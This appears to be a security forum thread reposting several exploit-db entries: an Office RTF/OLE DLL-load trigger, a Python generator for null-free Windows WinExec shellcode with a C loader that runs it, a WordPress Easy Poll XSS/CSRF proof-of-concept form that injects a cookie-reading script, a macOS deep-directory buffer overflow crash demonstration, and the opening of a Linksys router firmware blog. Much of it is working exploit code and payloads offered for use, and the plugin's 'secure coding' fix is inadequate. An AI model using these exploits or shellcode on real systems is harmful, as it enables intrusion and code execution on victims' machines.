[d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1487] 001b904c 76603170 76706494 00000000 001b94e4 ole32!CProcessActivator::CreateInstance+0x49 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1377] 001b908c 76602ef4 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917] 001b92ec 76603170 76706448 00000000 001b94e4 ole32!CClientContextActivator::CreateInstance+0xb0 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 685] 001b932c 76603098 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917] 001b9b04 76609e25 001b9c20 00000000 00000403 ole32!ICoCreateInstanceEx+0x404 [d:\w7rtm\com\ole32\com\objact\objact.cxx @ 1334] 001b9b64 76609d86 001b9c20 00000000 00000403 ole32!CComActivator::DoCreateInstance+0xd9 [d:\w7rtm\com\ole32\com\objact\immact.hxx @ 343] 001b9b88 76609d3f 001b9c20 00000000 00000403 ole32!CoCreateInstanceEx+0x38 
[d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 157] 001b9bb8 7662154c 001b9c20 00000000 00000403 ole32!CoCreateInstance+0x37 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 110] 001b9c34 7661f2af ecabafc9 11d27f19 00008e97 ole32!wCreateObject+0x106 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 3046] 001b9c98 7661f1d4 053d0820 00000000 605c63a8 ole32!OleLoadWithoutBinding+0x9c [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1576] *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\office14\mso.dll - 001b9cc0 5eb283bf 053d0820 605c63a8 02397a00 ole32!OleLoad+0x37 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1495] *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Microsoft Office\Office14\wwlib.dll - WARNING: Stack unwind information not available. Following frames may be wrong. 001b9d34 60a53973 053d0820 605c63a8 02397a00 mso!Ordinal2023+0x7c 001b9d80 60a53881 036dc800 053d0820 605c63a8 wwlib!DllGetLCID+0x46e24d It is also possible to trigger this DLL load without requiring a user click by using the following RTF document: {\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7becabafc9-7f19-11d2-978e-0000f8757e2a\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}} Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38968.zip Sursa: https://www.exploit-db.com/exploits/38968/.
-
#All Windows Null-Free WinExec Shellcode
"""
#Coded by B3mB4m
#Concat : b3mb4m@tuta.io
#Home : b3mb4m.blogspot.com
#10.12.2015
Tested on :
Windows XP/SP3 x86
Windows 7 Ultimate x64
Windows 8.1 Pro Build 9600 x64
Windows 10 Home x64
-This shellcode NOT using GetProcAddress function-
-With this python script you can create ur own shellcode-
-This script belongs to shellsploit project-
-https://github.com/b3mb4m/Shellsploit-
"""
# NOTE(review): Python 2 only -- relies on `print` statements and str.encode('hex').
# The script only assembles a hex string and writes it to a file; nothing is executed here.


def WinExec( command, fill=None):
    """Emit the x86 WinExec shellcode for `command` as a `\\x..` string.

    command -- command line handed to WinExec. Padded with spaces (0x20, so the
               result stays null-free) up to a multiple of 4 bytes, then pushed
               on the stack one little-endian dword at a time, last group first,
               so the string reads forwards in memory.
    fill    -- accepted for interface compatibility but overwritten on the first
               line of the body; callers cannot supply their own prefix.
    Returns None. Side effects: writes `<random>.txt` in the current directory
    and prints the length, file name and hex string.
    """
    from re import findall
    # Fixed prefix: per the author's note above it locates the target export
    # without GetProcAddress. The immediate 57696e45 is the ASCII tag "WinE"
    # that the lookup compares export names against.
    fill = "31c9b957696e45eb0431c9eb0031c"
    fill += "031db31d231ff31f6648b7b308b7f0"
    fill += "c8b7f1c8b47088b77208b3f807e0c3"
    fill += "375f289c703783c8b577801c28b7a2"
    fill += "001c789dd81f957696e45753b8b34a"
    fill += "f01c645390e75f68b7a2401c7668b2"
    fill += "c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd"
    if len(command) == 4:
        # Exactly one dword: hex-encode and emit a single `push imm32` (0x68).
        stack = "%s" % (command.encode('hex'))
        data = findall("..?", stack)
        fill += "68"+"".join(data)
    else:
        # Pad to a multiple of 4 with spaces so every push is a full dword.
        if len(command)%4 == 3:
            padd = "\x20"
        elif len(command)%4 == 2:
            padd = "\x20"*2
        elif len(command)%4 == 1:
            padd = "\x20"*3
        else:
            padd = ""
        command = command + padd
        fixmesempai = findall('....?', command)
        # Groups are pushed in reverse order. The per-group reversal and the
        # reversal of its hex pairs cancel out, so each group is emitted in
        # the same byte order as the 4-character branch above.
        for x in fixmesempai[::-1]:
            first = str(x[::-1].encode("hex"))
            second = findall("..?", first)[::-1]
            fill += "68"+"".join(second)
    # Tail: calls the resolved function with the stack string as its argument,
    # then appears to resolve and call ExitProcess (the immediates 45786974 and
    # 50726f63 spell "Exit" and "Proc") so the host process terminates.
    fill += "89e2415152ffd7e886ffffff8b34af0"
    fill += "1c645813e4578697475f2817e045072"
    fill += "6f6375e98b7a2401c7668b2c6f8b7a1c"
    fill += "01c78b7caffc01c731c951ffd7"
    from random import randint
    # Random file name; the .txt holds the same `\x..` string that is printed.
    name = str(randint(99999,99999999))+".txt"
    with open(name, "w") as exploit:
        exploit.write("\\x"+"\\x".join(findall("..?", fill)))
        exploit.close()
    print "\n\nLength : %s" % len(findall("..?", fill))
    print "File : %s\n" % name
    print "\n\\x"+"\\x".join(findall("..?", fill))


if __name__ == '__main__':
    from sys import argv
    if len(argv) < 2:
        print "\nUsage : python exploit.py 'command'\n"
    else:
        WinExec(argv[1])


# Reference C loader kept by the author as a bare string; it is documentation
# only and is never executed or written out by this script.
"""
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
//gcc shell.c -o shell.exe
int main(void){
char *shellcode = "SHELLCODE";
DWORD mypage;
BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &mypage);
if (!ret) { printf ("VirtualProtect Failed ..\n"); return EXIT_FAILURE;}
printf("strlen(shellcode)=%d\n", strlen(shellcode));
((void (void))shellcode)();
}
"""
Sursa: https://www.exploit-db.com/exploits/38959/.
-
Ma trimite incontinuu pe prima pagina. Poti, te rog, sa-i faci upload pe alt site? Mersi.
-
Ma trimite pe prima pagina. Oare a expirat link-ul?
-
tar -xvzf numeprogram.tar.gz sau tar -xvzf numeprogram.tar.gz -C /folder/ sa-l extragi undeva specific. Daca programelul tau e in extensia .bz2 foloseste tar -xvjf numeprogram.tar.bz2
-
http://www.mbsd.jp/Whitepaper/smtpi.pdf.
-
-
Exploit Title: WP Easy Poll 1.1.3 XSS and CSRF Exploit Author : Ahn Sung Jun Date : 2015-12-09 Vendor Homepage : https://wordpress.org/plugins/wp-easy-poll-afo/ Software Link : https://downloads.wordpress.org/plugin/wp-easy-poll-afo.1.1.3.zip Version : 1.1.3 Tested On : Kali Linux Iceweasel =========================================== Vulnerable Code : wp_easy_poll.php if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){ global $wpdb; $pc = new poll_class; /* Line 859 */ $insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']); $wpdb->insert( $wpdb->prefix.$pc->table, $insert ); $new_poll_id = $wpdb->insert_id; $p_anss = $_REQUEST['p_anss']; if(is_array($p_anss) and $new_poll_id){ foreach($p_anss as $key => $value){ if($value != ''){ $insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1); $wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 ); } } } =========================================== POC (XSS & CSRF) <html> <body onload="javascript:document.forms[0].submit()"> <form name="f" action="http://192.168.0.8/wordpress/wp-admin/admin.php?page=easy_polls&action=add" method="post"> <input type="hidden" name="action" value="p_add" /> <input type="hidden" name="p_ques" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="p_start" id="p_start" value="2015-11-18 22:55:52" required="required" /> <input type="hidden" name="p_end" id="p_end" value="2015-11-20 09:00:00" required="required"/> <input type="submit" name="submit" value="Submit" class="button" /> </form> </html> =========================================== Secure Coding (reviewer note: the character swapping shown below is not an adequate fix — it leaves other fields such as p_author and the answers untouched and does nothing for the CSRF vector; escape the values on output with esc_html()/esc_attr() and guard the p_add handler with a nonce check such as check_admin_referer()) if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){ global $wpdb; $pc = new poll_class; /* Secure Coding */ $_REQUEST['p_ques'] = str_replace("script", "x-script", $_REQUEST['p_ques']); $_REQUEST['p_ques'] =
str_replace("<", ">", $_REQUEST['p_ques']); $_REQUEST['p_ques']= str_replace(">" ,"<", $_REQUEST['p_ques']); $insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']); $wpdb->insert( $wpdb->prefix.$pc->table, $insert ); $new_poll_id = $wpdb->insert_id; $p_anss = $_REQUEST['p_anss']; if(is_array($p_anss) and $new_poll_id){ foreach($p_anss as $key => $value){ if($value != ''){ $insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1); $wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 ); } } } Sursa: https://www.exploit-db.com/exploits/38915/.
-
MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow Credit: Maksymilian Arciemowicz ( CXSECURITY ) Website: http://cxsecurity.com/ http://cert.cx/ Affected software: - MACOS's Commands such as: ls, find, rm - iPhone 4s and later, - Apple Watch Sport, Apple Watch, Apple Watch Edition and Apple Watch Hermes - Apple TV (4th generation) - probably more Apple's file system suffers from an issue recognised in the FTS library. The main problem occurs when we create a deep filesystem hierarchy. The unexpected behavior of many programs and the invalid memory write seem really interesting. PoC: Create a directory and perform the following actions: # for i in {1..1024}; do mkdir B && cd B; done ... cd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory If such an error occurs, don't panic; the script will continue. When the script finishes, you need to go back to the top of the directory tree. E.g. # for i in {1..1024}; do cd .. ; done Then you can run a recursive 'ls' command. Let's run it ten times: # for i in {1..10}; do ls -laR > /dev/null; done ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory Segmentation fault: 11 Segmentation fault: 11 Segmentation fault: 11 ls: B: No such file or directory ls: B: No such file or directory Segmentation fault: 11 ls: B: No such file or directory ls: B: No such file or directory It crashes randomly. Let's look at valgrind and lldb. LLDB: ... /B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: total 0 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. 
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 ./B/B/B/B/B/B/B/B/..../B/B: Process 987 stopped * thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 libsystem_c.dylib`strlen: -> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0 0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi 0x7fff97ab6d3a <+26>: andq $0xf, %rcx 0x7fff97ab6d3e <+30>: orq $-0x1, %rax (lldb) x/x $rdi error: memory read failed for 0xfeb66c00 (lldb) register read General Purpose Registers: rax = 0x00000000ffffffff rbx = 0x00000000ffffffff rcx = 0x00000000feb66c08 rdx = 0x00000000feb66c08 rdi = 0x00000000feb66c00 rsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742 rbp = 0x00007fff5fbfe710 rsp = 0x00007fff5fbfe710 ... rip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 ... 
(lldb) bt * thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) * frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 frame #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713 frame #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669 frame #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596 frame #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80 frame #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128 frame #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564 frame #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421 frame #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300 frame #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1 === Time for Valgrind ============= B/B/B/B/B/../B: total 0 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 
./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: total 0 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. 
drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 ==1009== Invalid write of size 1 ==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100001DAD: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? (in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== by 0x104809C8D: ??? ==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd ==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100001B92: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? (in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== by 0x104809C8D: ??? 
==1009== ./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: ==1009== Invalid read of size 1 ==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x1000024A7: ??? (in /bin/ls) ==1009== by 0x100001CFC: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? 
(in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd ==1009== ==1009== ==1009== Process terminating with default action of signal 11 (SIGSEGV) ==1009== Access not within mapped region at address 0x102D20318 ==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x1000024A7: ??? (in /bin/ls) ==1009== by 0x100001CFC: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? (in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== If you believe this happened as a result of a stack ==1009== overflow in your program's main thread (unlikely but ==1009== possible), you can try to increase the size of the ==1009== main thread stack using the --main-stacksize= flag. ==1009== The main thread stack size used in this run was 8388608. 
==1009== ==1009== HEAP SUMMARY: ==1009== in use at exit: 1,671,999 bytes in 6,025 blocks ==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated ==1009== ==1009== LEAK SUMMARY: ==1009== definitely lost: 519 bytes in 6 blocks ==1009== indirectly lost: 104 bytes in 6 blocks ==1009== possibly lost: 0 bytes in 0 blocks ==1009== still reachable: 1,645,151 bytes in 5,819 blocks ==1009== suppressed: 26,225 bytes in 194 blocks ==1009== Rerun with --leak-check=full to see details of leaked memory ==1009== ==1009== For counts of detected and suppressed errors, rerun with: -v ==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) Segmentation fault: 11 MacMini:SCANME cxsecurity$ It looks like a buffer overflow in memmove(). Code http://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c The same issue for 'find' which may be used in cron scripts like ./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print ./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print ./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days ./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1; Let's see valgrind output. MacMini:SCANME cxsecurity$ valgrind find . -name "R" ==1055== Memcheck, a memory error detector ==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==1055== Command: find . -name R ==1055== find: ./.Trashes: Permission denied ==1055== Invalid write of size 2 ==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) ==1055== by 0x1000013FA: ??? (in /usr/bin/find) ==1055== by 0x1000052AD: ??? 
(in /usr/bin/find) ==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) ==1055== by 0x3: ??? ==1055== by 0x10480CC7F: ??? ==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd ==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib) ==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) ==1055== by 0x1000013FA: ??? (in /usr/bin/find) ==1055== by 0x1000052AD: ??? (in /usr/bin/find) ==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) ==1055== by 0x3: ??? ==1055== by 0x10480CC7F: ??? ... An invalid memory write without a crash. BTW: Many antivirus vendors for Mac OS X seem to be blind to malicious software stored more than 512 directory levels deep, e.g. Eset32, Kaspersky etc. ====== References =================================== https://cxsecurity.com/issue/WLB-2014040027 https://cxsecurity.com/cveshow/CVE-2014-4433/ https://cxsecurity.com/cveshow/CVE-2014-4434/ https://cxsecurity.com/issue/WLB-2013110059 https://cxsecurity.com/cveshow/CVE-2013-6799/ https://cxsecurity.com/issue/WLB-2010040284 https://cxsecurity.com/cveshow/CVE-2010-0105/ https://cxsecurity.com/issue/WLB-2005090063 ====== Thanks =================================== Kacper and Smash_ from DEVILTEAM for technical support. ====== Credit =================================== Maksymilian Arciemowicz from cxsecurity.com http://cxsecurity.com/ http://cert.cx/ http://cifrex.org/ Sursa: https://www.exploit-db.com/exploits/38917/.
-
Hello folks, welcome to the first of a four part blog mini-series on firmware and embedded devices. My name is Matt Bergin and I'll be guiding you through the series. We plan to release each part of the series on the Friday of each week in December. The release of the final part in our series is dependent on our responsible disclosure timeline holding for a finding, but we're pretty confident. We're going to start slowly and with something simple. Today's tale is about a little access point that tried and tried but just couldn't keep its mouth shut. If it has an IP it'll talk, and what it says you might not like. Though we tried to make it stop (see the timeline in the advisory), it didn't seem to matter to the manufacturer. So here we are: an 0day to help start your holiday season. Sincerely, KoreLogic Onward and upward! You can purchase the vulnerable device and download the corresponding firmware here: Linksys Official Support - Linksys EA6100 AC1200 Dual-Band Smart Wi-Fi Wireless Router We'll start off by doing what every other blog on firmware reversing tells you to do: run binwalk. In this case, it will work without any changes and you'll end up with a sub-directory containing the files you're going to want. If you would rather work off of a live system, JTAG pins are on the board and the console can be found with your baudrate set to 115200. # ls bin etc JNAP libexec mnt proc sbin tmp var dev home lib linuxrc opt root sys usr www # cd www # ls bootloader_info.cgi incoming_log.txt security_log.txt cgi-bin jcgi speedtest_info.cgi dhcp_log.txt JNAP sysinfo.cgi ezwifi_cfg.cgi license.pdf ui get_counter_info.cgi outgoing_log.txt usbinfo.cgi getstinfo.cgi qos_info.cgi There are many CGI files of interest; I will only talk about a few. 
